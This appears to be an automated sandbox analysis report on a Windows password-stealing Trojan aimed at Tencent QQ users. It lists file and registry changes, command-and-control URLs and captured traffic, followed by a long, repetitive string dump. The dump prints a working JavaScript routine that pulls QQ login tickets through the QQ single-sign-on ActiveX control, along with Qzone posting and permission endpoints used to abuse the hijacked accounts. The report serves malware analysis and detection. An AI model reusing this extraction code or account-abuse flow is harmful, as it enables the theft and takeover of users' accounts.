MD5: e48aab3ebe9c90ab28ddf9ae34572704
SHA1: 80a93f3fdcc982c28c0fb67268ed6372a793bd5a
SHA256: f6cf59e76a45535b9839fa5b2444915179fae7174e97411264f2af202e9998d8
SSDeep: 24576:djco9HBcyy9wYbqdu Uy3kmaJBgFB2b5HDubJQ5eseDX2nXUXNNVi:eIymLUy3kmambOeDCMN7i
Size: 1552384 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2016-12-01 09:40:58
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3380

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\winhelp.ini (381 bytes)
C:\Windows\0cm7.dll (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\udp[1].htm (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\fs[1].htm (52 bytes)
C:\Windows\System32\ML4v.txt (31 bytes)
C:\Windows\System32\JiTG.txt (52 bytes)
C:\Windows\1kmu.exe (50 bytes)
C:\Windows\System32\6298.txt (31 bytes)

The Trojan deletes the following file(s):

C:\Windows\winhelp.ini (0 bytes)
C:\Windows\System32\JiTG.txt (0 bytes)
C:\Windows\System32\ML4v.txt (0 bytes)
C:\Windows\System32\6298.txt (0 bytes)

Registry activity

The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://ipaddress.wb916.com/udp.htm	120.55.106.30
hxxp://ipaddress.wb916.com/fs.aspx	120.55.106.30
dns.msftncsi.com	131.107.255.255

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /udp.htm HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: ipaddress.wb916.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 31

Content-Type: text/html

Last-Modified: Fri, 25 Nov 2016 18:01:38 GMT

Accept-Ranges: bytes

ETag: "d639eaf74547d21:1324"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Thu, 08 Dec 2016 17:01:46 GMT
[120.55.106.30|120.55.106.30]......


GET /fs.aspx HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: ipaddress.wb916.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 08 Dec 2016 17:01:48 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30128

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 52
......IP...:..[194.242.96.218]........:(.........)..HTTP/1.1 200 OK..D
ate: Thu, 08 Dec 2016 17:01:48 GMT..Server: Microsoft-IIS/6.0..X-Power
ed-By: ASP.NET..X-AspNet-Version: 4.0.30128..Cache-Control: private..C
ontent-Type: text/html; charset=utf-8..Content-Length: 52........IP...
:..[194.242.96.218]........:(.........)....

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

diu2.iuG?iu

CCmdTarget

CNotSupportedException

commctrl_DragListMsg

COMCTL32.DLL

__MSVCRT_HEAP_SELECT

user32.dll

GetProcessHeap

KERNEL32.dll

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GDI32.dll

comdlg32.dll

WINSPOOL.DRV

COMCTL32.dll

GetCPInfo

SetWindowsHookExA

GetKeyState

UnhookWindowsHookEx

RegCloseKey

RegCreateKeyExA

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

c:\windows\

.reloc

WS2_32.dll

iphlpapi.dll

SHLWAPI.dll

GetWindowsDirectoryA

ShellExecuteA

ole32.dll

10.dll

\config.ini

qq.exe

.rsrc

t%SVh

t$(SSh

~%UVW

u.hxHN

u$SShe

kernel32.dll

shlwapi.dll

Kernel32.dll

IPHLPAPI.DLL

ws2_32.dll

oleaut32.dll

OleAut32.dll

atl.dll

Winhttp.dll

wininet.dll

WinHttpCheckPlatform

WinHttpCrackUrl

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpSetTimeouts

WinHttpSetCredentials

WinHttpCloseHandle

WinHttpSetOption

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpQueryHeaders

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

{A068799B-7551-46b9-8CA8-EEF8357AFEA4}

WebBrowser

socket_udp

120.55.106.30

120.55.148.93

.txt?

hXXp://list.uc916.com:7000/server/qzone/

\sdfDll.ini

154396063

(*^__^*)

hXXp://api.t.sina.com.cn/short_url/shorten.json?source=3213676317&url_long=

[0].url_short

hXXp://

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: application/x-www-form-urlencoded

ipaddress.wb916.com

/fs.aspx

{4590f811-1d3a-11d0-891f-00aa004b2e24}

{dc12a687-737f-11cf-884d-00aa004b2e24}

hXXp://ipaddress.wb916.com/udp.htm

120.55.106.30|120.55.148.93

|qqkey|

SSOAxCtrlForPTLogin.SSOForPTLogin2

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};

\npSSOAxCtrlForPTLogin.dll

\SSOCommon.dll

\SSOLUIControl.dll

\SSOPlatform.dll

%System%\regsvr32.exe /s /u "

%System%\regsvr32.exe /s "

&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com&clientkey=

hXXp://ptlogin2.qq.com/jump?clientuin=

ptui_qlogin_CB('0', '

hXXp://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?uin=

msglist

].content

msglist[

].rt_uin

].pic

].height

].pic[

].width

].tid

p_skey=(.*?);

http=

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Adodb.Stream

WinHttp

hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_delete_v6?g_tk=

/311&hostuin=

qzreferrer=http://user.qzone.qq.com/

hXXp://w.qzone.qq.com/cgi-bin/right/set_entryright.cgi?g_tk=

/profile/permit&flag=0x0&fupdate=1&uin=

/profile/permit&flag=0x20101&fupdate=1&uin=

/profile/permit&flag=0x40000&fupdate=1&uin=

/profile/permit

frameElement.callback(

hXXp://w.qzone.qq.com/cgi-bin/right/set_revertright.cgi?g_tk=

/profile/permit&fupdate=1&uin=

hXXp://user.qzone.qq.com/p/r/cgi-bin/tfriend/friend_show_qqfriends.cgi?uin=

data.items

].uin

data.items[

].name

hXXp://union.uc916.com/zone/get

hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_forward_v6?g_tk=

hXXp://union.uc916.com/zone/set

,nick:

hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_re_feeds?g_tk=

skey=

Content-Disposition: form-data; name="skey"

skey

1.jpg

Content-Disposition: form-data; name="filename"; filename="1.jpg"

hXXp://shup.photo.qq.com/cgi-bin/upload/cgi_upload_image

&special_url=&subrichtype=1&pic_bo=

/311&syn_tweet_verson=1¶mstr=1&pic_template=&richtype=1&richval=

/311&syn_tweet_verson=1¶mstr=1&pic_template=tpl-

hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=

https

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

HTTP/1.1

hXXps://

hXXp://b1.qzone.qq.com/cgi-bin/blognew/add_blog?g_tk=

&iNotice=1&inCharset=utf-8&outCharset=utf-8&format=fs&ref=qzone&json=1&g_tk=800267314&secverifykey=28Q1206

qzreferrer=http://ctc.qzs.qq.com/qzone/newblog/v5/editor.html#opener=refererurl&source=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&cate=个人日记&title=

hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_save?g_tk=

&share2weibo=0&onekey=0&comment=0&entryuin=

qzreferrer=http://ctc.qzs.qq.com/qzone/app/qzshare/popup.html¬ice=1&fupdate=1&platform=qzone&token=1594827009&auto=0&type=blog&description=

hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareaddcomment?fupdate=2&g_tk=

&spaceuin=0&isfriend=1&uin=

qzreferrer=http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzsharegetmylistbytype?uin=

hXXp://b11.qzone.qq.com/cgi-bin/blognew/add_comment?g_tk=

&secverifykey=28Q1206

&dprefix=&inCharset=gb2312&outCharset=gb2312&ref=qzone&page=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&uin=

&styledm=ctc.qzonestyle.gtimg.cn&imgdm=ctc.qzs.qq.com&bdm=b.qzone.qq.com&mode=2&numperpage=15×tamp=

&blogid=

qzreferrer=http://b11.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=

1970-01-01 08:00:00

hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=

&type=4&url=

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Referer: hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.ecyc.net?v0TPk3ocH5

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.7.1000 Chrome/30.0.1599.101 Safari/537.36

Origin: hXXp://sns.qzone.qq.com

hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_timershuoshuo_v6?g_tk=

&clientkey=

&keyindex=9&pt_aid=715030901&daid=371&u1=http://buluo.qq.com/p/barindex.html?bid=

ptui_qlogin_CB(

&source=2&extparam={"client_type":4}&bkn=

Host: buluo.qq.com

Origin: hXXp://buluo.qq.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Referer: hXXp://buluo.qq.com/p/barindex.html?bid=230661

hXXp://buluo.qq.com/cgi-bin/bar/site/post/pub_rich_post

hXXp://captcha.qq.com/getimage?aid=716013036&v=0.

c:/teset.jpg

17004455

hXXp://buluo.qq.com/cgi-bin/bar/post/captcha/verify_v2

hXXp://union.uc916.com/zone/list

hXXp://buluo.qq.com/p/detail.html?bid=

&like=1&source=2&extparam={"client_type":4}&r=0.

hXXp://buluo.qq.com/cgi-bin/bar/post/like

","pic_list":[{"url":"

&coordinate=1&source=2&extparam={"client_type":4}&pid=

hXXp://buluo.qq.com/cgi-bin/bar/post/comment_v2

------WebKitFormBoundarya59o1fM4ajrut49e

Content-Disposition: form-data; name="file"; filename="1.jpg"

------WebKitFormBoundarya59o1fM4ajrut49e--

Host: upload.buluo.qq.com

Content-Type: multipart/form-data;boundary=----WebKitFormBoundarya59o1fM4ajrut49e

Referer: hXXp://buluo.qq.com/buluoadmin/for-crossdomain.html

hXXp://upload.buluo.qq.com/cgi-bin/bar/upload/image?callback=singleImgUpload

url":"

hXXp://union.uc916.com/zone/del?userId=

c:\windows\iextadd.dat

\delext .bat

var t=$.activetxsso,e=t.CreateTXSSOData();

t.InitSSOFPTCtrl(0,e);

var i=t.DoOperation(1,e);

for(var o=i.GetArray("PTALIST"),p=o.GetSize(),r=0;

var a=o.GetData(r),c=a.GetDWord("dwSSO_Account_dwAccountUin"),u=a.GetDWord("dwSSO_Account_dwAccountUin"),g="",d=a.GetByte("cSSO_Account_cAccountType"),h=c;

g=a.GetArray("SSO_Account_AccountValueList"),h=g.GetStr(0)

m=a.GetWord("wSSO_Account_wFaceIndex")

_=a.GetStr("strSSO_Account_strNickName")

for(var v=a.GetBuf("bufST_PTLOGIN"),w="",y=v.GetSize(),b=0;

var k=v.GetAt(b).toString("16");

1==k.length&&(k="0" k),w =k

document.body.innerHTML=qq754497519();

hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=522005705&daid=4&s_url=hXXps://mail.qq.com

hXXp://api.ruokuai.com/register.xml

hXXp://api.ruokuai.com/info.xml

hXXp://api.ruokuai.com/recharge.xml

hXXp://api.ruokuai.com/create.xml

hXXp://api.ruokuai.com/reporterror.xml

VBScript.RegExp

MSScriptControl.ScriptControl

if (typeof Date.prototype.toJSON !== 'function') {

Date.prototype.toJSON = function (key) {

return isFinite(this.valueOf()) ?

this.getUTCFullYear()   '-'  

f(this.getUTCMonth()   1)   '-'  

f(this.getUTCDate())   'T'  

f(this.getUTCHours())   ':'  

f(this.getUTCMinutes())   ':'  

f(this.getUTCSeconds())   'Z' : null;

String.prototype.toJSON =

Number.prototype.toJSON =

Boolean.prototype.toJSON = function (key) {

return this.valueOf();

'"' : '\\"',

'\\': '\\\\'

escapable.lastIndex = 0;

return escapable.test(string) ? '"'   string.replace(escapable, function (a) {

'\\u'   ('0000'   a.charCodeAt(0).toString(16)).slice(-4);

function str(key, holder) {

// Produce a string from holder[key].

k, // The member key.

value = holder[key];

typeof value.toJSON === 'function') {

value = value.toJSON(key);

value = rep.call(holder, key, value);

if (Object.prototype.toString.apply(value) === '[object Array]') {

length = value.length;

// Join all of the elements together, separated with commas, and wrap them in

v = partial.length === 0 ? '[]' : gap ?

'[\n'   gap   partial.join(',\n'   gap)   '\n'   mind   ']' :

'['   partial.join(',')   ']';

length = rep.length;

partial.push(quote(k)   (gap ? ': ' : ':')   v);

// Otherwise, iterate through all of the keys in the object.

if (Object.prototype.hasOwnProperty.call(value, k)) {

// Join all of the member texts together, separated with commas,

v = partial.length === 0 ? '{}' : gap ?

'{\n'   gap   partial.join(',\n'   gap)   '\n'   mind   '}' :

'{'   partial.join(',')   '}';

if (typeof JSON.stringify !== 'function') {

JSON.stringify = function (value, replacer, space) {

// that can replace values, or an array of strings that will select the keys.

typeof replacer.length !== 'number')) {

throw new Error('JSON.stringify');

// Make a fake root object containing our value under the key of ''.

if (typeof JSON.parse !== 'function') {

JSON.parse = function (text, reviver) {

function walk(holder, key) {

var k, v, value = holder[key];

if (Object.prototype.hasOwnProperty.call(value, k)) {

return reviver.call(holder, key, value);

// Parsing happens in four stages. In the first stage, we replace certain

cx.lastIndex = 0;

if (cx.test(text)) {

text = text.replace(cx, function (a) {

('0000'   a.charCodeAt(0).toString(16)).slice(-4);

// We split the second stage into 4 regexp operations in order to work around

.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')

.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')

.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {

// JavaScript structure. The '{' operator is subject to a syntactic ambiguity

// In the optional fourth stage, we recursively walk the new structure, passing

throw new SyntaxError('JSON.parse');

// These forms are obsolete. It is recommended that JSON.stringify and

// JSON.parse be used instead.

if (!Object.prototype.toJSONString) {

Object.prototype.toJSONString = function (filter) {

return JSON.stringify(this, filter);

Object.prototype.parseJSON = function (filter) {

return JSON.parse(this, filter);

JSON.stringify(

.push(

.map)'){

.splice(

) {ary=ary  key ','; }

var ary=''; for (var key in

&password=

application/x-www-form-urlencoded

&softkey=

Content-Disposition: form-data; name="password"

{pass}

Content-Disposition: form-data; name="softkey"

{softkey}

Content-Disposition: form-data; name="image"; filename="System.Byte[]"

SetClientCertificate

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

?456789:;<=

!"#$%&'()* ,-./0123

F%*.*f

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

MSH_SCROLL_LINES_MSG

MSWHEEL_ROLLMSG

Broken pipe

Inappropriate I/O control operation

Operation not permitted

RASAPI32.dll

WinExec

GetViewportOrgEx

WINMM.dll

OLEAUT32.dll

oledlg.dll

InternetCrackUrlA

InternetCanonicalizeUrlA

WININET.dll

CreateDialogIndirectParamA

GetViewportExtEx

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

:%d) |

%I64d%s

:0{}%s

:%d)%s

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

zcÁ

#include "l.chs\afxres.rc" // Standard components

z>kernel32.dll

Comdlg32.dll

program internal error number is %d.

:"%s"

:"%s".

;3 #>6.&

'2, / 0&7!4-)1#

c:\windows\winhelp.ini

121.43.144.6

120.26.218.133

/udp.htm

121.43.144.6|120.26.218.133

timwp.exe

Timwp.dll

Timwp.dll"

AppCom.dll

AppCom.dll"

CPHelper.dll

CPHelper.dll"

KernelUtil.dll

KernelUtil.dll"

&fromSubId=1&subcmd=all&uin=

timwp.exe tencent://AddContact/?fromId=

timwp.exe

Common.dll

@`AMainFrame.dll

wAhXXp://list.uc916.com:7000/server/imin/list.txt?

5B3838F5-0C81-46D9-A4C0-6EA28CA3E942

urlmon

gdi32.dll

URLDownloadToFileA

=#>->5>=>

; <$<(<,<0<

1%1-161?1

3 3$3(3,30343@3

c:\%original file name%.exe

(*.*)

1kmu.exe_3700:

.text

`.rdata

@.data

diu2.iuG?iup

CCmdTarget

CNotSupportedException

commctrl_DragListMsg

COMCTL32.DLL

__MSVCRT_HEAP_SELECT

user32.dll

GetProcessHeap

KERNEL32.dll

MsgWaitForMultipleObjects

USER32.dll

comdlg32.dll

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GDI32.dll

WINSPOOL.DRV

COMCTL32.dll

SHLWAPI.dll

GetCPInfo

SetWindowsHookExA

GetKeyState

UnhookWindowsHookEx

RegCloseKey

RegCreateKeyExA

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

qq.exe

.rsrc

t%SVh

t$(SSh

~%UVW

u.hxHN

u$SShe

kernel32.dll

ole32.dll

shlwapi.dll

Kernel32.dll

IPHLPAPI.DLL

ws2_32.dll

oleaut32.dll

OleAut32.dll

atl.dll

Winhttp.dll

wininet.dll

WinHttpCheckPlatform

WinHttpCrackUrl

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpSetTimeouts

WinHttpSetCredentials

WinHttpCloseHandle

WinHttpSetOption

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpQueryHeaders

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

{A068799B-7551-46b9-8CA8-EEF8357AFEA4}

WebBrowser

socket_udp

120.55.106.30

120.55.148.93

.txt?

hXXp://list.uc916.com:7000/server/qzone/

\sdfDll.ini

\config.ini

154396063

(*^__^*)

hXXp://api.t.sina.com.cn/short_url/shorten.json?source=3213676317&url_long=

[0].url_short

hXXp://

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: application/x-www-form-urlencoded

ipaddress.wb916.com

/fs.aspx

{4590f811-1d3a-11d0-891f-00aa004b2e24}

{dc12a687-737f-11cf-884d-00aa004b2e24}

hXXp://ipaddress.wb916.com/udp.htm

120.55.106.30|120.55.148.93

|qqkey|

SSOAxCtrlForPTLogin.SSOForPTLogin2

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};

\npSSOAxCtrlForPTLogin.dll

\SSOCommon.dll

\SSOLUIControl.dll

\SSOPlatform.dll

%System%\regsvr32.exe /s /u "

%System%\regsvr32.exe /s "

&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com&clientkey=

hXXp://ptlogin2.qq.com/jump?clientuin=

ptui_qlogin_CB('0', '

hXXp://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?uin=

msglist

].content

msglist[

].rt_uin

].pic

].height

].pic[

].width

].tid

p_skey=(.*?);

http=

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Adodb.Stream

WinHttp

hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_delete_v6?g_tk=

/311&hostuin=

qzreferrer=http://user.qzone.qq.com/

hXXp://w.qzone.qq.com/cgi-bin/right/set_entryright.cgi?g_tk=

/profile/permit&flag=0x0&fupdate=1&uin=

/profile/permit&flag=0x20101&fupdate=1&uin=

/profile/permit&flag=0x40000&fupdate=1&uin=

/profile/permit

frameElement.callback(

hXXp://w.qzone.qq.com/cgi-bin/right/set_revertright.cgi?g_tk=

/profile/permit&fupdate=1&uin=

hXXp://user.qzone.qq.com/p/r/cgi-bin/tfriend/friend_show_qqfriends.cgi?uin=

data.items

].uin

data.items[

].name

hXXp://union.uc916.com/zone/get

hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_forward_v6?g_tk=

hXXp://union.uc916.com/zone/set

,nick:

hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_re_feeds?g_tk=

skey=

Content-Disposition: form-data; name="skey"

skey

1.jpg

Content-Disposition: form-data; name="filename"; filename="1.jpg"

hXXp://shup.photo.qq.com/cgi-bin/upload/cgi_upload_image

&special_url=&subrichtype=1&pic_bo=

/311&syn_tweet_verson=1¶mstr=1&pic_template=&richtype=1&richval=

/311&syn_tweet_verson=1¶mstr=1&pic_template=tpl-

hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=

https

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

HTTP/1.1

hXXps://

hXXp://b1.qzone.qq.com/cgi-bin/blognew/add_blog?g_tk=

&iNotice=1&inCharset=utf-8&outCharset=utf-8&format=fs&ref=qzone&json=1&g_tk=800267314&secverifykey=28Q1206

qzreferrer=http://ctc.qzs.qq.com/qzone/newblog/v5/editor.html#opener=refererurl&source=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&cate=个人日记&title=

hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_save?g_tk=

&share2weibo=0&onekey=0&comment=0&entryuin=

qzreferrer=http://ctc.qzs.qq.com/qzone/app/qzshare/popup.html¬ice=1&fupdate=1&platform=qzone&token=1594827009&auto=0&type=blog&description=

hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareaddcomment?fupdate=2&g_tk=

&spaceuin=0&isfriend=1&uin=

qzreferrer=http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzsharegetmylistbytype?uin=

hXXp://b11.qzone.qq.com/cgi-bin/blognew/add_comment?g_tk=

&secverifykey=28Q1206

&dprefix=&inCharset=gb2312&outCharset=gb2312&ref=qzone&page=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&uin=

